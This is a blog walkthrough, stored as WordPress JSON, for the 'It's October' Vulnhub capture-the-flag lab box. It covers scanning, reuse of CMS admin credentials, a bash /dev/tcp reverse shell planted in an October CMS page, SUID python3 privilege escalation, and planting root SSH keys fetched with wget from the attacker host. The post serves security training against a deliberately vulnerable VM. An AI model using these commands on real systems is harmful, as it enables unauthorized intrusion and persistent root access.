{"id":25948,"date":"2020-04-07T16:57:53","date_gmt":"2020-04-07T11:27:53","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25948"},"modified":"2020-04-11T01:10:49","modified_gmt":"2020-04-10T19:40:49","slug":"its-october-vulnhub-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","title":{"rendered":"It’s October Vulnhub Walkthrough"},"content":{"rendered":"

Here’s the new challenge of “It’s October Vulnhub Walkthrough”<\/strong><\/a>.\u00a0 It’s October is an easy box for the beginner and wannabe hackers. It is a box learning about October CMS and enumeration. The box was designed by Akansha Verma<\/a>. This machine got something unique as it teaches you how you can exploit a cms even if you can’t find any known vulnerability.<\/p>\n

\"It's<\/h3>\n

Pentester Methodology<\/h3>\n

Network Scanning<\/h5>\n
    \n
  • nmap<\/li>\n
  • netdiscover<\/li>\n<\/ul>\n
    Enumeration<\/h5>\n
      \n
    • nikto<\/li>\n
    • gobuster<\/li>\n
    • placing of reverse shell<\/li>\n<\/ul>\n
      Privilege Escalation<\/h5>\n
        \n
      • abusing SETUID<\/li>\n<\/ul>\n

        Network Discovery<\/h3>\n

        In order to get the IP of the machine I used, netdiscover. As I allotted host-only adapter to my machine.<\/p>\n

        #netdiscover -i vboxnet0\r\n\r\nCurrently scanning: 192.168.157.0\/16   |   Screen View: Unique Hosts                                                                                        \r\n4 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 222               \r\n_____________________________________________________________________________\r\n  IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n-----------------------------------------------------------------------------\r\n192.168.2.2     08:00:27:ac:26:45      1      42  PCS Systemtechnik GmbH      \r\n192.168.2.12    08:00:27:cb:f2:fb      3     180  PCS Systemtechnik GmbH<\/pre>\n
        And got my IP : 192.168.2.12.<\/strong> Now lets begin with nmap scan.<\/p>\n
        #nmap -A -O -sS -sC -p- 192.168.2.12\r\n\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-06 18:59 IST\r\nNmap scan report for 192.168.2.12\r\nPORT     STATE SERVICE VERSION\r\n22\/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)\r\n|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)\r\n80\/tcp   open  http    Apache httpd 2.4.38 ((Debian))\r\n|_http-server-header: Apache\/2.4.38 (Debian)\r\n|_http-title: Homepage | My new websites\r\n3306\/tcp open  mysql   MySQL (unauthorized)\r\n8080\/tcp open  http    Apache httpd 2.4.38 ((Debian))\r\n|_http-open-proxy: Proxy might be redirecting requests\r\n|_http-server-header: Apache\/2.4.38 (Debian)\r\n|_http-title: My Note\r\nMAC Address: 08:00:27:CB:F2:FB (Oracle VirtualBox virtual NIC)\r\n<\/pre>\n
        I saw that ports 80<\/strong> and 8080<\/strong> are open, so without any delay, I visited the page.<\/p>\n
        \"It's<\/p>\n
        It’s just a normal website. I don’t get anything useful in page source. But still moving forward.<\/p>\n
        \"\"<\/p>\n
        This is also a simple web page. But it consists a clue in the page source<\/strong> to visit 192.168.2.12\/mynote.txt<\/strong><\/p>\n
        \"\"<\/p>\n
        We got credentials for cms admin:adminadmin2. <\/strong>I used nikto<\/strong> for further enumeration but nothing much.<\/p>\n
        So I tried directory brute-forcing. I used gobuster<\/strong> and found a directory \/backend <\/strong>showing the code 302.<\/p>\n
        #gobuster dir -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt  -u http:\/\/192.168.2.12\r\n\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n[+] Url:            http:\/\/192.168.2.12\r\n[+] Threads:        10\r\n[+] Wordlist:       \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\r\n[+] Status codes:   200,204,301,302,307,401,403\r\n[+] User Agent:     gobuster\/3.0.1\r\n[+] Timeout:        10s\r\n===============================================================\r\n2020\/04\/06 19:14:00 Starting gobuster\r\n===============================================================\r\n\/themes (Status: 301)\r\n\/modules (Status: 301)\r\n\/0 (Status: 200)\r\n\/storage (Status: 301)\r\n\/plugins (Status: 301)\r\n\/backend (Status: 302)\r\n\/vendor (Status: 301)\r\n\/config (Status: 301)\r\nProgress: 13383 \/ 220561 (6.07%)^C\r\n[!] Keyboard interrupt detected, terminating.\r\n===============================================================\r\n2020\/04\/06 19:22:15 Finished\r\n===============================================================<\/pre>\n
        Eureka. We got a CMS login page of OCTOBER CMS. I the old credential for the login.<\/p>\n
        \"\"<\/p>\n
         <\/p>\n
        And we are in.. The first checkpoint arrived. Now we need to upload a reverse shell on the CMS in order to get a shell. So for that, we open cms tab <\/strong> on the Dashboard> <\/strong>click on +ADD><\/strong>enter the details of the page along with the shell>Save it.<\/strong><\/p>\n
        function onstart(){\r\n     exec(\"\/bin\/bash -c 'bash -i > \/dev\/tcp\/192.168.2.1\/1505 0>&1'\");\r\n}<\/pre>\n
        \"It's<\/p>\n
         <\/p>\n
        Now start the listener on the local machine and call the web page on the web.<\/p>\n
        #nc -nlvp 1505\r\n\r\nlistening on [any] 1505 ...\r\nconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.12] 4038\r\nbash-5.0$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)<\/pre>\n
        Privilege Escalation:<\/h3>\n
        Now for the privilege, I got nothing but a local user named armour<\/strong>. Then we checked for suid:<\/p>\n
        bash-5.0$ find \/ -perm -u=s -type f 2>\/dev\/null\r\n\r\n\/usr\/bin\/newgrp\r\n\/usr\/bin\/su\r\n\/usr\/bin\/python3\r\n\/usr\/bin\/passwd\r\n\/usr\/bin\/chfn\r\n\/usr\/bin\/chsh\r\n\/usr\/bin\/mount\r\n\/usr\/bin\/umount\r\n\/usr\/bin\/python3.7\r\n\/usr\/bin\/gpasswd\r\n\/usr\/lib\/eject\/dmcrypt-get-device\r\n\/usr\/lib\/openssh\/ssh-keysign\r\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper<\/pre>\n
         <\/p>\n
        So we got SUID<\/strong> bit configured on \/bin\/python3.<\/strong> We can approach for the root using this.<\/p>\n
        bash-5.0$ cd \/tmp\/\r\nbash-5.0$ vim armour.py \r\n\r\n #!\/usr\/bin\/python\r\n import os\r\n os.execl(\"\/bin\/bash\",\"sh\",\"-p\")\r\n ~                                                                               \r\n ~                                                                               \r\n ~                                                                               \r\n ~                                                                               \r\n :wq!\r\n                                                                                                \r\nbash-5.0$ chmod 777 armour.py \r\nbash-5.0$ python3 armour.py \r\n\r\nsh-5.0# id\r\nuid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)\r\nsh-5.0# cd \/root\/\r\nsh-5.0# ls\r\nproof.txt\r\nsh-5.0# cat proof.txt \r\nBest of Luck\r\n$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq\r\n<\/pre>\n
        BOOM! we have the flag and euid of root!!. But we need to get the proper shell so I transfer the authorized_keys to the machine and called for ssh connection.<\/p>\n
        sh-5.0# cd \/root\/.ssh\r\nsh-5.0# wget http:\/\/192.168.2.1:8080\/authorized_keys \r\n--2020-04-06 10:23:55--  http:\/\/192.168.2.1:8080\/authorized_keys\r\nConnecting to 192.168.2.1:8080... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: 569 [application\/octet-stream]\r\nSaving to: \u2018authorized_keys\u2019\r\n\r\nauthorized_keys     100%[===================>]     569  --.-KB\/s    in 0s      \r\n\r\n2020-04-06 10:23:55 (41.3 MB\/s) - \u2018authorized_keys\u2019 saved [569\/569]\r\n\r\nsh-5.0# ls \r\nauthorized_keys\r\n\r\n#ssh 192.168.2.12\r\nThe authenticity of host '192.168.2.12 (192.168.2.12)' can't be established.\r\nECDSA key fingerprint is SHA256:DYZkjGYMu99f1Ml7F6XHJ+4Oh\/GISu41\/GP0Y+yMgpg.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.12' (ECDSA) to the list of known hosts.\r\n   ##############################################################################################\r\n   #                                      Armour Infosec                                        #\r\n   #                         --------- www.armourinfosec.com ------------                       #\r\n   #                                    It's October\t                                        #\r\n   #                               Designed By  :- Akanksha Sachin Verma                        #\r\n   #                               Twitter      :- @akankshavermasv                             #\r\n   ##############################################################################################                                       IP:\\4\r\n                                       Hostname: \\n\r\nDebian GNU\/Linux 10\r\nLinux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64The programs included with the Debian GNU\/Linux system are free software;\r\nthe exact distribution terms for each program are described in the\r\nindividual files in \/usr\/share\/doc\/*\/copyright.\r\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\npermitted by applicable law.\r\nLast login: Fri Mar 27 10:53:25 2020 from 192.168.1.6\r\n\r\nroot@october:~# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@october:~# hostname\r\noctober\r\nroot@october:~# uname -a\r\nLinux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU\/Linux\r\nroot@october:~# cd \r\nroot@october:~# cat proof.txt \r\nBest of Luck\r\n$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
        Here’s the new challenge of “It’s October Vulnhub Walkthrough”.\u00a0 It’s October is an easy box for the beginner and wannabe…<\/p>\n","protected":false},"author":1,"featured_media":25950,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[119,126,118],"yoast_head":"\nIt's October Vulnhub Walkthrough - Armour Infosec<\/title>\n<meta name=\"description\" content=\"Here's the new challenge of "It's October Vulnhub Walkthrough".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"It's October Vulnhub Walkthrough - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"Here's the new challenge of "It's October Vulnhub Walkthrough".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-07T11:27:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-10T19:40:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-06-19-02-19.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1366\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/\",\"name\":\"It's October Vulnhub Walkthrough - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-04-07T11:27:53+00:00\",\"dateModified\":\"2020-04-10T19:40:49+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"Here's the new challenge of \\\"It's October Vulnhub Walkthrough\\\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"It’s October Vulnhub Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"It's October Vulnhub Walkthrough - Armour Infosec","description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"It's October Vulnhub Walkthrough - Armour Infosec","og_description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","og_url":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-07T11:27:53+00:00","article_modified_time":"2020-04-10T19:40:49+00:00","og_image":[{"width":1366,"height":768,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-06-19-02-19.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/","name":"It's October Vulnhub Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-07T11:27:53+00:00","dateModified":"2020-04-10T19:40:49+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Here's the new challenge of \"It's October Vulnhub Walkthrough\".\u00a0 It's October is an easy box for the beginners designed by Akanksha Sachin Verma.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/its-october-vulnhub-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"It’s October Vulnhub Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25948"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=25948"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25948\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/25950"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=25948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=25948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=25948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}